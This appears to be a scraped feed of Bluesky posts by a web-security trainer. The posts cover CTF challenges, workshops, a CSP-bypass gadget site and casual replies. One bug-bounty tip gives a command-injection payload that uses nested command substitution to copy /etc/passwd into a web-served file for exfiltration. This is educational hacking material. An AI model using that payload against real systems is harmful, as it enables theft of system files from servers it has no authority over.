Haha, love the fact we got to see your whole thought process haha, nice work :)

Secure Coding Challenge…

What is insecure about this code? And how would you extract a file? For example /etc/passwd

If it doesn't work, it's always DNS you know. I created a challenge around this nightmare that will be kindly hosted by @hackinghub.bsky.social starting today at 18:00 UTC. Thanks @buildhacksecure.bsky.social for the kind hospitality.

So say we have the webroot:

/var/www/you-cant-guess/

And a file located here: /var/www/you-cant-guess/assets/uniquefile.png

The above command becomes:

cat /etc/passwd > /var/www/you-cant-guess/assets/uniquefile.png.txt

Got an RCE in a background process with no outbound network so you need to exfil to webroot without knowing the location?

All you need to know is a uniue filename in the webroot.

$( cat /etc/passwd > $(find / -name uniquefile.png 2>/dev/null).txt )

#bugbountytips #hacking

Merry Christmas!

I don't know how I feel about AI. As a dev for 20+ yrs, I love coding, creating, solving puzzles. AI saves time & makes sense for business, but is it sucking the joy out of it? Are we all just becoming prompt engineers? Maybe I'm just an old man shouting at clouds...

Thank you mate, I try :)

Adam has the rare ability to turn seemingly simple situations into opportunities for reflection or learning.

I once did one side of a cube, that's the furthest I've got haha

Okay, I have a toxic CTF challenge idea.... Should I do it? Operation "Merry ToxMas"

2 Hours in and weirdly not tired. Just covered our SQL Injection module.

Hosting a workshop with @nahamsec.bsky.social remotely in Aus from 10pm to 1:30am for YowConf! Come on coffee!!!

👋

Oh yeah, totally all downhill from here.

Ah Happy Birthday dude, welcome to the 40 club!

Yeah I totally agree, it feels so much calmer here.

Ah nice, you too buddy :)

Hey BlueSky!

I case you missed it:

I've created cspbypass.com
A site where you can search for known CSP bypass gadgets to gain XSS.

It already contains a bunch of useful gadgets with contributions from your favourite hackers.

If you have some CSP bypasses to share, feel free to contribute!

I'm delivering a talk about web app security ( or the lack of it ) in web apps and also delivering a workshop in Melbourne, Brisbane and Sydney at the start of Decemeber! See yowcon.com for more detail.

Can't work out whether you're giving a talk or belting out a song :)

Hoping I prefer this platform a little more :) Give us a follow if you're into web app security or web development #webdev #hacking #ethicalhacker #php